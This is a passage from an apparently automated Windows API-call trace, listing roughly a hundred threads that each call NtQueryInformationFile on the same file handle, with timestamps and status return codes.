| out: IoStatusBlock=0x361fd10, FileInformation=0x208e20) returned 0x0 Thread: id = 405 os_tid = 0x440 [0161.405] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f958, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f958, FileInformation=0x208e20) returned 0x0 Thread: id = 406 os_tid = 0x7d8 [0161.407] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff9a8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff9a8, FileInformation=0x208e20) returned 0x0 Thread: id = 407 os_tid = 0xa60 [0161.408] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc00, FileInformation=0x208e20) returned 0x0 Thread: id = 408 os_tid = 0xb24 [0161.410] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfda0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfda0, FileInformation=0x208e20) returned 0x0 Thread: id = 409 os_tid = 0x878 [0161.416] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe58, FileInformation=0x208e20) returned 0x0 Thread: id = 410 os_tid = 0xb1c [0161.420] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fae8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fae8, FileInformation=0x208e20) returned 0x0 Thread: id = 411 os_tid = 0xb08 [0161.422] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc18, FileInformation=0x208e20) returned 0x0 Thread: id = 412 os_tid = 0x4fc [0161.423] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f928, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f928, FileInformation=0x208e20) returned 0x0 Thread: id = 413 os_tid = 0x4dc [0161.425] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fd60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fd60, FileInformation=0x208e20) returned 0x0 Thread: id = 414 os_tid = 0x43c [0161.427] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f9f8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f9f8, FileInformation=0x208e20) returned 0x0 Thread: id = 415 os_tid = 0x1c4 [0161.430] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfdc8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfdc8, FileInformation=0x208e20) returned 0x0 Thread: id = 416 os_tid = 0xbec [0161.431] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff08, FileInformation=0x208e20) returned 0x0 Thread: id = 417 os_tid = 0xb48 [0161.433] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f918, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f918, FileInformation=0x208e20) returned 0x0 Thread: id = 418 os_tid = 0x5bc [0161.435] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc40, FileInformation=0x208e20) returned 0x0 Thread: id = 419 os_tid = 0x6b8 [0161.450] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fae0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fae0, FileInformation=0x208e20) returned 0x0 Thread: id = 420 os_tid = 0x2dc [0161.452] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe08, FileInformation=0x208e20) returned 0x0 Thread: id = 421 os_tid = 0x158 [0161.454] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df918, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df918, FileInformation=0x208e20) returned 0x0 Thread: id = 422 os_tid = 0x6cc [0161.455] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df848, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df848, FileInformation=0x208e20) returned 0x0 Thread: id = 423 os_tid = 0x694 [0161.457] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd70, FileInformation=0x208e20) returned 0x0 Thread: id = 424 os_tid = 0x6d8 [0161.459] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fac8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fac8, FileInformation=0x208e20) returned 0x0 Thread: id = 425 os_tid = 0x87c [0161.461] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff9b0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff9b0, FileInformation=0x208e20) returned 0x0 Thread: id = 426 os_tid = 0xb88 [0161.463] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc60, FileInformation=0x208e20) returned 0x0 Thread: id = 427 os_tid = 0xb8c [0161.465] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfa90, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfa90, FileInformation=0x208e20) returned 0x0 Thread: id = 428 os_tid = 0x700 [0161.467] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fc58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fc58, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 429 os_tid = 0x6f0 [0161.469] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f8a8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f8a8, FileInformation=0x208e20) returned 0x0 Thread: id = 430 os_tid = 0x130 [0161.471] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc98, FileInformation=0x208e20) returned 0x0 Thread: id = 431 os_tid = 0x754 [0161.473] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb98, FileInformation=0x208e20) returned 0x0 Thread: id = 432 os_tid = 0x72c [0161.475] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb38, FileInformation=0x208e20) returned 0x0 Thread: id = 433 os_tid = 0x748 [0161.477] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fd60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fd60, FileInformation=0x208e20) returned 0x0 Thread: id = 434 os_tid = 0x928 [0161.478] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc50, FileInformation=0x208e20) returned 0x0 Thread: id = 435 os_tid = 0xcc [0161.484] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe30, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 436 os_tid = 0xd0 [0161.486] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfab8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfab8, FileInformation=0x208e20) returned 0x0 Thread: id = 437 os_tid = 0xd4 [0161.488] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf798, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf798, FileInformation=0x208e20) returned 0x0 Thread: id = 438 os_tid = 0xd8 [0161.489] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa48, FileInformation=0x208e20) returned 0x0 Thread: id = 439 os_tid = 0xdc [0161.496] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd08, FileInformation=0x208e20) returned 0x0 Thread: id = 440 os_tid = 0xe0 [0161.499] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe58, FileInformation=0x208e20) returned 0x0 Thread: id = 441 os_tid = 0xe4 [0161.501] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fce0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fce0, FileInformation=0x208e20) returned 0x0 Thread: id = 442 os_tid = 0xe8 [0161.503] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe60, FileInformation=0x208e20) returned 0x0 Thread: id = 443 os_tid = 0xec [0161.504] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd98, FileInformation=0x208e20) returned 0x0 Thread: id = 444 os_tid = 0x9d8 [0161.506] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe78, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe78, FileInformation=0x208e20) returned 0x0 Thread: id = 445 os_tid = 0x898 [0161.512] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff60, FileInformation=0x208e20) returned 0x0 Thread: id = 446 os_tid = 0x48c [0161.514] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf9f8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf9f8, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 447 os_tid = 0x6a4 [0161.519] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f908, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f908, FileInformation=0x208e20) returned 0x0 Thread: id = 448 os_tid = 0x20c [0161.521] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371ff68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371ff68, FileInformation=0x208e20) returned 0x0 Thread: id = 449 os_tid = 0x704 [0161.523] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf9e0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf9e0, FileInformation=0x208e20) returned 0x0 Thread: id = 450 os_tid = 0x568 [0161.524] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfab8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfab8, FileInformation=0x208e20) returned 0x0 Thread: id = 451 os_tid = 0x5ac [0161.526] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f7b0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f7b0, FileInformation=0x208e20) returned 0x0 Thread: id = 452 os_tid = 0x908 [0161.528] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffea8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffea8, FileInformation=0x208e20) returned 0x0 Thread: id = 453 os_tid = 0x888 [0161.530] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fcb8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fcb8, FileInformation=0x208e20) returned 0x0 Thread: id = 454 os_tid = 0x544 [0161.532] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb50, FileInformation=0x208e20) returned 0x0 Thread: id = 455 os_tid = 0x76c [0161.534] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fe00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fe00, FileInformation=0x208e20) returned 0x0 Thread: id = 456 os_tid = 0xa9c [0161.537] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf7e8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf7e8, FileInformation=0x208e20) returned 0x0 Thread: id = 457 os_tid = 0x114 [0161.538] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f930, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f930, FileInformation=0x208e20) returned 0x0 Thread: id = 458 os_tid = 0x5b8 [0161.540] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff08, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 459 os_tid = 0x814 [0161.542] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f860, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f860, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 460 os_tid = 0x834 [0161.543] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc20, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 461 os_tid = 0x884 [0161.545] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367ff40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367ff40, FileInformation=0x208e20) returned 0x0 Thread: id = 462 os_tid = 0x5d4 [0161.547] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f810, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f810, FileInformation=0x208e20) returned 0x0 Thread: id = 463 os_tid = 0x340 [0161.549] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f788, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f788, FileInformation=0x208e20) returned 0x0 Thread: id = 464 os_tid = 0x810 [0161.551] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fbf8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fbf8, FileInformation=0x208e20) returned 0x0 Thread: id = 465 os_tid = 0x830 [0161.553] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fb78, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fb78, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 466 os_tid = 0x880 [0161.555] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff00, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 467 os_tid = 0xae4 [0161.557] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df9e8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df9e8, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 468 os_tid = 0x570 [0161.559] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f948, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f948, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 469 os_tid = 0xb40 [0161.561] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fbd8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fbd8, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 470 os_tid = 0x5f4 [0161.563] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb08, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 471 os_tid = 0xbb8 [0161.565] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f8c8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f8c8, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 472 os_tid = 0x598 [0161.567] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfa40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfa40, FileInformation=0x208e20) returned 0x0 Thread: id = 473 os_tid = 0x4e4 [0161.569] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf868, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf868, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 474 os_tid = 0xbfc [0161.571] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfb28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfb28, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 475 os_tid = 0x80c [0161.577] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc88, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 476 os_tid = 0xbf8 [0161.579] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fbc0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fbc0, FileInformation=0x208e20) returned 0x0 Thread: id = 477 os_tid = 0x524 [0161.584] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf950, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf950, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 478 os_tid = 0x674 [0161.586] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa28, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 479 os_tid = 0x4a0 [0161.603] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f878, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f878, FileInformation=0x208e20) returned 0x0 Thread: id = 480 os_tid = 0x5d8 [0161.610] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fde8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fde8, FileInformation=0x208e20) returned 0x0 Thread: id = 481 os_tid = 0x69c [0161.612] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fe78, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fe78, FileInformation=0x208e20) returned 0x0 Thread: id = 482 os_tid = 0x6a8 [0161.614] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f928, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f928, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 483 os_tid = 0x500 [0161.616] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff918, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff918, FileInformation=0x208e20) returned 0x0 Thread: id = 484 os_tid = 0x4e0 [0161.618] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfdf8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfdf8, FileInformation=0x208e20) returned 0x0 Thread: id = 485 os_tid = 0x330 [0161.620] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fde8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fde8, FileInformation=0x208e20) returned 0x0 Thread: id = 486 os_tid = 0xa30 [0161.621] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fce8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fce8, FileInformation=0x208e20) returned 0x0 Thread: id = 487 os_tid = 0xb50 [0161.623] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa28, FileInformation=0x208e20) returned 0x0 Thread: id = 488 os_tid = 0xb70 [0161.625] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff40, FileInformation=0x208e20) returned 0x0 Thread: id = 489 os_tid = 0xb6c [0161.627] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fed8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fed8, FileInformation=0x208e20) returned 0x0 Thread: id = 490 os_tid = 0xb74 [0161.629] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe48, FileInformation=0x208e20) returned 0x0 Thread: id = 491 os_tid = 0xb68 [0161.631] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffdb0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffdb0, FileInformation=0x208e20) returned 0x0 Thread: id = 492 os_tid = 0x758 [0161.633] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff870, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff870, FileInformation=0x208e20) returned 0x0 Thread: id = 493 os_tid = 0x3d4 [0161.635] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfda0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfda0, FileInformation=0x208e20) returned 0x0 Thread: id = 494 os_tid = 0x484 [0161.637] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffae0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffae0, FileInformation=0x208e20) returned 0x0 Thread: id = 495 os_tid = 0xb4c [0161.639] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff00, FileInformation=0x208e20) returned 0x0 Thread: id = 496 os_tid = 0xa1c [0161.641] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f888, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f888, FileInformation=0x208e20) returned 0x0 Thread: id = 497 os_tid = 0x2ac [0161.642] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfb38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfb38, FileInformation=0x208e20) returned 0x0 Thread: id = 498 os_tid = 0xa8c [0161.644] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fcc0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fcc0, FileInformation=0x208e20) returned 0x0 Thread: id = 499 os_tid = 0x68c [0161.647] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd48, FileInformation=0x208e20) returned 0x0 Thread: id = 500 os_tid = 0x388 [0161.648] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc88, FileInformation=0x208e20) returned 0x0 Thread: id = 501 os_tid = 0xa50 [0161.650] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe08, FileInformation=0x208e20) returned 0x0 Thread: id = 502 os_tid = 0x75c [0161.652] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff828, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff828, FileInformation=0x208e20) returned 0x0 Thread: id = 503 os_tid = 0x240 [0161.654] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb58, FileInformation=0x208e20) returned 0x0 Thread: id = 504 os_tid = 0x320 [0161.657] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f918, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f918, FileInformation=0x208e20) returned 0x0 Thread: id = 505 os_tid = 0x3b4 [0161.659] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fbf8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fbf8, FileInformation=0x208e20) returned 0x0 Thread: id = 506 os_tid = 0x760 [0161.662] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe40, FileInformation=0x208e20) returned 0x0 Thread: id = 507 os_tid = 0xb00 [0161.671] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe10, FileInformation=0x208e20) returned 0x0 Thread: id = 508 os_tid = 0x7fc [0161.673] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f7d0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f7d0, FileInformation=0x208e20) returned 0x0 Thread: id = 509 os_tid = 0xb18 [0161.675] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc60, FileInformation=0x208e20) returned 0x0 Thread: id = 510 os_tid = 0xa68 [0161.678] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfcf8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfcf8, FileInformation=0x208e20) returned 0x0 Thread: id = 511 os_tid = 0x224 [0161.679] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc38, FileInformation=0x208e20) returned 0x0 Thread: id = 512 os_tid = 0x2c4 [0161.681] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff30, FileInformation=0x208e20) returned 0x0 Thread: id = 513 os_tid = 0x24c [0161.683] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359faa0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359faa0, FileInformation=0x208e20) returned 0x0 Thread: id = 514 os_tid = 0x4e8 [0161.685] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc68, FileInformation=0x208e20) returned 0x0 Thread: id = 